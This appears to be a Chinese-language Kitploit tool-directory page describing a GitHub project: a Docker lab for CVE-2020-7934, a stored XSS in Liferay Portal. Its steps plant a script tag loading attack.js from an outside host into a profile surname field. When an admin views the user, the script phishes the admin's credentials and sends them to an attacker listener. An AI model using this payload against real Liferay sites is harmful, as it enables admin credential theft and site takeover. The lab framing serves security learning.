Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
audit-xss-cve-2020-7934 — 基于Docker的XSS利用工具,针对CVE-2020-7934,攻击Liferay门户。演示通过用户资料字段进行存储型跨站脚本攻击,以窃取管理员凭证。 | Kitploit
工具/GitHubGitHub/giardinas-dev/audit-xss-cve-2020-7934
漏洞分析漏洞利用Web应用程序漏洞利用CTF渗透测试学习与教育
GitHubgiardinas-dev/audit-xss-cve-2020-7934

audit-xss-cve-2020-7934

基于Docker的XSS利用工具,针对CVE-2020-7934,攻击Liferay门户。演示通过用户资料字段进行存储型跨站脚本攻击,以窃取管理员凭证。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
454年前尚未审核
分享

CVE 2020-7934

如何运行CVE

要求

  1. docker

备注

可以将攻击脚本放在线上(提供JS代码)http://yourjavascript.com/ 我们用于攻击的JS脚本在线 html <script src="http://yourjavascript.com/920172199111/attack.js"></script>

配置命令

  1. 进入本项目的根目录
  2. 运行 "sudo docker-compose up --build"
  3. 新终端:运行 "docker inspect liferay" ==> 并复制IPAddress的值
  4. 新终端:运行 "python api_attacker.py"
  5. 打开浏览器,访问 "http://IPAddress:8080" ==> 应看到liferay门户作为响应
  6. 停止并删除容器使用 "sudo docker-compose rm"

攻击步骤

  1. 在liferay中注册为用户,登录,并在"可用站点"部分加入"liferay"站点。
  2. 将"姓氏"更改为JS脚本(直接使用 () 或通过 "src =" http ... "")
  3. 以管理员身份登录liferay(用户名:[email protected],密码:test)
  4. 转到可用站点,点击"liferay",将打开该站点的公共页面。
  5. 转到新页面,右侧会打开一个菜单,点击"成员资格"(membership)。
  6. 选择在步骤1中注册的用户。此时脚本将被执行。 5.1) 在脚本attack.js中,页面将要求输入凭据。
  7. 在步骤5(配置命令中的步骤5)的终端中,将打印步骤5.1中输入的(由管理员输入的)用户名/密码。
下载工具